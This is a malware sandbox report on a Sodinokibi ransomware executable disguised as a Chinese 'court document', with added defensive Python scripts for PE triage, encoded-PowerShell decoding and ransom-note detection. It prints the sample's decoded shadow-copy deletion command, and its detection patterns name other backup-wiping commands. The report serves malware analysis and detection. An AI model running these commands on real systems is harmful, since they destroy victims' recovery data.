File name: 法庭文件.doc.exe (法庭文件 is Chinese for "court document"; note the double extension .doc.exe)

Full analysis: https://app.any.run/tasks/c3fdbd54-9dd9-4ce8-a63c-5f74f305cd86
Verdict: Malicious activity
Threats:

Ransomware is malicious software that locks users out of their system or data in order to extort a ransom. Most often it encrypts files on the infected machine and demands payment in exchange for the decryption key. Some families also steal sensitive data from the compromised host, or launch DDoS attacks against the victim organization, to add pressure to pay.

Analysis date: August 26, 2019, 02:11:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
sodinokibi
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: C2F9A837F5606782F7FE1B905C46CC7F
SHA1: B7E187BE2C1D8D7B05549609F2574FB19B332802
SHA256: 6759FAC9B96E651B41FFE7C040148E81E4ED33F55E1FD51A37AF7CFC28831842
SSDEEP: 6144:2vvs2SNR1CXe2V0yRu+HDuMqFTrEEsKqNQwGb4YY:Ovs2S31kV0OHDBqFHr9w2G

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as-is for the user's information. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Sodinokibi keys found

      • 法庭文件.doc.exe (PID: 3428)
    • Dropped file may contain instructions of ransomware

      • 法庭文件.doc.exe (PID: 3428)
    • Sodinokibi ransom note found

      • 法庭文件.doc.exe (PID: 3428)
    • Changes settings of System certificates

      • 法庭文件.doc.exe (PID: 3428)
    • Renames files like Ransomware

      • 法庭文件.doc.exe (PID: 3428)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2984)
    • Executed via COM

      • unsecapp.exe (PID: 3928)
    • Executes PowerShell scripts

      • 法庭文件.doc.exe (PID: 3428)
    • Application launched itself

      • 法庭文件.doc.exe (PID: 3504)
    • Creates files in the program directory

      • 法庭文件.doc.exe (PID: 3428)
    • Executed as Windows Service

      • vssvc.exe (PID: 2452)
    • Creates files like Ransomware instruction

      • 法庭文件.doc.exe (PID: 3428)
    • Adds / modifies Windows certificates

      • 法庭文件.doc.exe (PID: 3428)
  • INFO

    • Dropped object may contain TOR URL's

      • 法庭文件.doc.exe (PID: 3428)
    • Dropped object may contain Bitcoin addresses

      • 法庭文件.doc.exe (PID: 3428)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (72.3)
.exe | Win32 Executable (generic) (11.8)
.exe | Clipper DOS Executable (5.2)
.exe | Generic Win/DOS Executable (5.2)
.exe | DOS Executable Generic (5.2)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x4730
UninitializedDataSize: -
InitializedDataSize: 77807104
CodeSize: 71680
LinkerVersion: 12
PEType: PE32
TimeStamp: 2018:09:29 12:52:18+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 29-Sep-2018 10:52:18
Debug artifacts:
  • C:\xererari34\yiyew.pdb

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 29-Sep-2018 10:52:18
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name      Virtual Address  Virtual Size  Raw Size    Characteristics                                                                Entropy
.text     0x00001000       0x0001166A    0x00011800  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ                  6.65314
.rdata    0x00013000       0x00033B76    0x00033C00  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ                             6.25866
.data     0x00047000       0x049FA9E0    0x00001800  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE        3.32215
.kabupit  0x04A42000       0x00003800    0x00002A00  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE        0
.rsrc     0x04A46000       0x00001608    0x00001800  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ                             5.44771
.reloc    0x04A48000       0x00001470    0x00001600  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ  6.37911
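Two things in the section table above deserve a second look before any dynamic analysis: .data declares a VirtualSize of 0x049FA9E0 bytes but only 0x1800 bytes of raw data (the loader reserves roughly 77 MB of writable memory that the file does not fill), and .kabupit is a non-standard writable section whose raw bytes have entropy 0. Together with an import table of only three DLLs (ADVAPI32, KERNEL32, USER32) for a sample that later opens TLS connections, this suggests the real code and API set are materialised at runtime. The following script is an added example, not part of the ANY.RUN report: it packs the section values shown above into real IMAGE_SECTION_HEADER bytes, parses them back with struct, and runs the checks a triage script would apply to any PE. PointerToRawData and the file size are not in the report, so the offsets assigned by build_section_table() are constructed.

```python
import struct

# IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics.
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a normal MSVC-linked image carries; anything else deserves a look.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                        ".edata", ".pdata", ".bss", ".tls", ".CRT", ".xdata", ".gfids"}

# Values copied from the report's section table: (name, VirtualAddress, VirtualSize,
# SizeOfRawData, Characteristics, entropy). File offsets are NOT in the report and
# are assigned sequentially below (constructed).
REPORT_SECTIONS = [
    (".text",    0x00001000, 0x0001166A, 0x00011800, 0x60000020, 6.65314),
    (".rdata",   0x00013000, 0x00033B76, 0x00033C00, 0x40000040, 6.25866),
    (".data",    0x00047000, 0x049FA9E0, 0x00001800, 0xC0000040, 3.32215),
    (".kabupit", 0x04A42000, 0x00003800, 0x00002A00, 0xC0000040, 0.0),
    (".rsrc",    0x04A46000, 0x00001608, 0x00001800, 0x40000040, 5.44771),
    (".reloc",   0x04A48000, 0x00001470, 0x00001600, 0x42000040, 6.37911),
]


def build_section_table(rows, first_raw_offset=0x400):
    """Pack rows into raw IMAGE_SECTION_HEADER bytes; returns (blob, file_size)."""
    blob, raw_ptr = b"", first_raw_offset
    for name, vaddr, vsize, rawsize, chars, _entropy in rows:
        blob += SECTION_HEADER.pack(name.encode("ascii").ljust(8, b"\0"),
                                    vsize, vaddr, rawsize, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += rawsize
    return blob, raw_ptr


def parse_section_headers(blob, count, offset=0):
    """Parse `count` section headers starting at `offset` in `blob` (works on a real PE too)."""
    sections = []
    for i in range(count):
        f = SECTION_HEADER.unpack_from(blob, offset + i * SECTION_HEADER.size)
        sections.append({
            "name": f[0].rstrip(b"\0").decode("ascii", errors="replace"),
            "vsize": f[1], "vaddr": f[2], "rawsize": f[3], "rawptr": f[4], "chars": f[9],
        })
    return sections


def section_anomalies(sections, file_size, entropy=None, ratio_limit=16):
    """Return human-readable findings for the packer/loader tricks visible in a section table."""
    entropy = entropy or {}
    findings = []
    for s in sections:
        n = s["name"]
        if s["rawsize"] and s["vsize"] > ratio_limit * s["rawsize"]:
            findings.append(f"{n}: VirtualSize 0x{s['vsize']:X} is {s['vsize'] // s['rawsize']}x "
                            f"SizeOfRawData 0x{s['rawsize']:X}; memory reserved far beyond what the file supplies")
        if (s["chars"] & IMAGE_SCN_MEM_EXECUTE) and (s["chars"] & IMAGE_SCN_MEM_WRITE):
            findings.append(f"{n}: writable and executable (self-modifying or unpacking section)")
        if s["rawptr"] + s["rawsize"] > file_size:
            findings.append(f"{n}: raw data extends past end of file")
        if n not in COMMON_SECTION_NAMES:
            findings.append(f"{n}: non-standard section name")
        if n in entropy and entropy[n] == 0 and s["rawsize"]:
            findings.append(f"{n}: entropy 0 over 0x{s['rawsize']:X} bytes (uniform filler, typically zeros)")
    return findings


def analyse_report_sample():
    """Round-trip the report's section table through the packer and parser, then check it."""
    blob, file_size = build_section_table(REPORT_SECTIONS)
    sections = parse_section_headers(blob, len(REPORT_SECTIONS))
    entropy = {row[0]: row[5] for row in REPORT_SECTIONS}
    return section_anomalies(sections, file_size, entropy)


if __name__ == "__main__":
    for line in analyse_report_sample():
        print(line)
```

On a real file, point parse_section_headers() at the offset e_lfanew + 4 + 20 + SizeOfOptionalHeader (here 0xF0 + 24 + 0xE0) with NumberOfSections from the file header; the checks are the same.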

Resources

Title  Entropy  Size  Codepage  Language  Type
1      5.66141  4264  UNKNOWN   UNKNOWN   RT_ICON
2      6.32131  1128  UNKNOWN   UNKNOWN   RT_ICON
125    2.21059  34    UNKNOWN   UNKNOWN   RT_GROUP_ICON

Imports

ADVAPI32.dll
KERNEL32.dll
USER32.dll
No data.
All screenshots are available in the full report
Total processes: 43
Monitored processes: 5
Malicious processes: 2
Suspicious processes: 0

Behavior graph

Process tree shown in the graph: explorer.exe → 法庭文件.doc.exe (PID 3504) → 法庭文件.doc.exe (PID 3428, #SODINOKIBI) → powershell.exe (PID 2984); unsecapp.exe (PID 3928) is started by svchost.exe and vssvc.exe (PID 2452) by services.exe.

Process information

PID 3504  法庭文件.doc.exe
  CMD: "C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exe"
  Path: C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exe
  Parent process: explorer.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 3428  法庭文件.doc.exe  (#SODINOKIBI)
  CMD: "C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exe"
  Path: C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exe
  Parent process: 法庭文件.doc.exe (PID 3504)
  User: admin
  Integrity Level: HIGH

PID 2984  powershell.exe
  CMD: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  Decoded -e payload (base64 of UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: 法庭文件.doc.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3928  unsecapp.exe
  CMD: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  Path: C:\Windows\system32\wbem\unsecapp.exe
  Parent process: svchost.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: HIGH
  Description: Sink to receive asynchronous callbacks for WMI client application
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2452  vssvc.exe
  CMD: C:\Windows\system32\vssvc.exe
  Path: C:\Windows\system32\vssvc.exe
  Parent process: services.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Microsoft® Volume Shadow Copy Service
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
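The one child process the sample spawns is powershell.exe with an encoded command (PID 2984). Decoding it explains the rest of the tree: the payload enumerates Win32_Shadowcopy over WMI and deletes every instance, which is why the WMI callback sink unsecapp.exe and the Volume Shadow Copy service vssvc.exe appear, and it runs at HIGH integrity because the parent re-launched itself elevated (PID 3504 at MEDIUM, PID 3428 at HIGH). The script below is an added example, not code from the report: it decodes the -EncodedCommand argument the way powershell.exe does (base64 over UTF-16LE) and matches the result, or the plain command line, against the shadow-copy deletion variants a detection rule should cover. The report's command line is used as-is; the comparison lines are constructed.

```python
import base64
import re

# Command line recorded in the report for PID 2984 (copied from the page).
REPORT_CMDLINE = "powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="

# Constructed comparison lines (not from the report): a benign encoded command
# and the two other common ways of wiping shadow copies.
OTHER_CMDLINES = [
    "powershell.exe -NoProfile -EncodedCommand "
    + base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii"),
    "vssadmin.exe delete shadows /all /quiet",
    "wmic shadowcopy delete",
]

# Patterns for the deletion primitives; the first covers the WMI route this sample used.
SHADOW_COPY_PATTERNS = [
    re.compile(r"win32_shadowcopy.*(\.delete\s*\(|remove-wmiobject|remove-ciminstance)", re.I),
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]


def _is_encoded_flag(token):
    """powershell.exe accepts -EncodedCommand, any prefix of it (-e, -en, -enc, ...) and -ec."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or "encodedcommand".startswith(name)


def decode_encoded_command(cmdline):
    """Return the script text behind -EncodedCommand, or None if absent or not valid base64."""
    tokens = cmdline.split()  # sufficient here: the base64 blob never contains whitespace
    for flag, blob in zip(tokens, tokens[1:]):
        if _is_encoded_flag(flag):
            try:
                raw = base64.b64decode(blob, validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            # powershell.exe expects the decoded bytes to be UTF-16LE text, not UTF-8
            return raw.decode("utf-16-le", errors="replace")
    return None


def shadow_copy_deletion(cmdline):
    """Return {'decoded': bool, 'text': str} when the command deletes volume shadow copies, else None."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    for pattern in SHADOW_COPY_PATTERNS:
        if pattern.search(text):
            return {"decoded": decoded is not None, "text": text}
    return None


if __name__ == "__main__":
    for line in [REPORT_CMDLINE] + OTHER_CMDLINES:
        hit = shadow_copy_deletion(line)
        print("ALERT " if hit else "ok    ", hit["text"] if hit else line[:60])
```

Because the match runs on the decoded text, the same rule fires whether the operator passes the script in clear, encoded, or with an abbreviated flag; matching only on the raw command line would miss this sample entirely.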
Total events: 620
Read events: 544
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 168
Text files: 1
Unknown types: 1

Dropped files

PID 2984  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FLDJTLI6HRT7F4KL92I6.temp
  MD5 / SHA256: not recorded
PID 3428  法庭文件.doc.exe  C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
  MD5 / SHA256: not recorded
PID 2984  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16bc40.TMP  (binary)
  MD5: 0F2CAD9746414ABA31294C3B560FCFD5
  SHA256: 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
PID 3428  法庭文件.doc.exe  C:\users\admin\contacts\xth86-readme.txt  (binary)
  MD5: E716F01D2110ECD33EBE2D9958E2EEAA
  SHA256: A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
PID 3428  法庭文件.doc.exe  C:\users\admin\documents\xth86-readme.txt  (binary)
  MD5: E716F01D2110ECD33EBE2D9958E2EEAA
  SHA256: A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
PID 3428  法庭文件.doc.exe  C:\users\public\xth86-readme.txt  (binary)
  MD5: E716F01D2110ECD33EBE2D9958E2EEAA
  SHA256: A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
PID 3428  法庭文件.doc.exe  C:\users\administrator\xth86-readme.txt  (binary)
  MD5: E716F01D2110ECD33EBE2D9958E2EEAA
  SHA256: A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
PID 3428  法庭文件.doc.exe  C:\recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\xth86-readme.txt  (binary)
  MD5: E716F01D2110ECD33EBE2D9958E2EEAA
  SHA256: A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
PID 3428  法庭文件.doc.exe  C:\recovery\xth86-readme.txt  (binary)
  MD5: E716F01D2110ECD33EBE2D9958E2EEAA
  SHA256: A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
PID 3428  法庭文件.doc.exe  C:\users\admin\favorites\xth86-readme.txt  (binary)
  MD5: E716F01D2110ECD33EBE2D9958E2EEAA
  SHA256: A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
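The dropped-file list shows the ransom-note fan-out behind the "Sodinokibi ransom note found" and "Creates files like Ransomware instruction" signatures: one identical file (SHA256 A1488C05...) named xth86-readme.txt written into seven separate directories, a naming scheme consistent with Sodinokibi's <extension>-readme.txt notes. That shape is detectable without knowing the note's content or name in advance. The script below is an added example, not part of the report: it groups the report's own dropped-file rows by writing process and content hash and flags any file that lands in many directories, with a constructed keyword list as a secondary hint.

```python
import ntpath
from collections import defaultdict

NOTE_SHA256 = "A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0"

# (pid, process, path, sha256) rows copied from the report's "Dropped files" table;
# an empty sha256 means the report recorded none for that file.
DROPPED_FILES = [
    (2984, "powershell.exe", r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FLDJTLI6HRT7F4KL92I6.temp", ""),
    (3428, "法庭文件.doc.exe", r"C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi", ""),
    (2984, "powershell.exe", r"C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16bc40.TMP",
     "19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15"),
    (3428, "法庭文件.doc.exe", r"C:\users\admin\contacts\xth86-readme.txt", NOTE_SHA256),
    (3428, "法庭文件.doc.exe", r"C:\users\admin\documents\xth86-readme.txt", NOTE_SHA256),
    (3428, "法庭文件.doc.exe", r"C:\users\public\xth86-readme.txt", NOTE_SHA256),
    (3428, "法庭文件.doc.exe", r"C:\users\administrator\xth86-readme.txt", NOTE_SHA256),
    (3428, "法庭文件.doc.exe", r"C:\recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\xth86-readme.txt", NOTE_SHA256),
    (3428, "法庭文件.doc.exe", r"C:\recovery\xth86-readme.txt", NOTE_SHA256),
    (3428, "法庭文件.doc.exe", r"C:\users\admin\favorites\xth86-readme.txt", NOTE_SHA256),
]

# Constructed list of words that commonly appear in ransom-note file names (secondary hint only).
NOTE_NAME_HINTS = ("readme", "decrypt", "restore", "recover", "how_to", "how-to")


def ransom_note_candidates(rows, min_dirs=3):
    """Flag identical content written by one process into at least `min_dirs` distinct directories."""
    groups = defaultdict(lambda: {"dirs": set(), "names": set()})
    for pid, _process, path, sha256 in rows:
        if not sha256:  # nothing to correlate on
            continue
        group = groups[(pid, sha256.upper())]
        group["dirs"].add(ntpath.dirname(path).lower())     # ntpath: Windows paths on any host
        group["names"].add(ntpath.basename(path).lower())
    findings = []
    for (pid, sha256), group in groups.items():
        if len(group["dirs"]) < min_dirs:
            continue
        name = sorted(group["names"])[0]
        findings.append({
            "pid": pid,
            "sha256": sha256,
            "name": name,
            "directories": len(group["dirs"]),
            "note_like_name": any(hint in name for hint in NOTE_NAME_HINTS),
        })
    return findings


if __name__ == "__main__":
    for finding in ransom_note_candidates(DROPPED_FILES):
        print(f"PID {finding['pid']}: {finding['name']} dropped into {finding['directories']} directories "
              f"(sha256 {finding['sha256'][:12]}..., note-like name: {finding['note_like_name']})")
```

The hash-and-directory grouping is the primary signal; the name keywords only raise confidence, so a note called something unexpected still surfaces.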
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 11
DNS requests: 8
Threats: 0

HTTP requests

No HTTP requests

Connections

All recorded connections are outbound TLS on port 443 and no plaintext HTTP was captured, so the PCAP in the full report is needed to inspect the traffic itself. Rows without a PID are shown as the report lists them.

PID   Process           IP:port              Domain                              ASN                                  CN  Reputation
3428  法庭文件.doc.exe  52.174.40.218:443    blucamp.com                         Microsoft Corporation                NL  suspicious
3428  法庭文件.doc.exe  35.247.160.145:443   speakaudible.com                    (not recorded)                       US  unknown
                        149.255.60.142:443   acornishstudio.co.uk                Awareness Software Limited           GB  suspicious
3428  法庭文件.doc.exe  37.140.192.212:443   avtoboss163.ru                      Domain names registrar REG.RU, Ltd   RU  suspicious
3428  法庭文件.doc.exe  213.186.33.3:443     matthieupetel.fr                    OVH SAS                              FR  malicious
3428  法庭文件.doc.exe  37.218.255.162:443   diakonie-weitramsdorf-sesslach.de   dogado GmbH                          DE  suspicious
                        217.160.0.95:443     photographycreativity.co.uk         1&1 Internet SE                      DE  malicious
3428  法庭文件.doc.exe  213.186.33.85:443    galatee-couture.com                 OVH SAS                              FR  suspicious

DNS requests

Domain                              IP               Reputation
speakaudible.com                    35.247.160.145   suspicious
blucamp.com                         52.174.40.218    suspicious
matthieupetel.fr                    213.186.33.3     malicious
avtoboss163.ru                      37.140.192.212   suspicious
diakonie-weitramsdorf-sesslach.de   37.218.255.162   suspicious
acornishstudio.co.uk                149.255.60.142   suspicious
galatee-couture.com                 213.186.33.85    suspicious
photographycreativity.co.uk         217.160.0.95     malicious

Threats

No threats detected
No debug info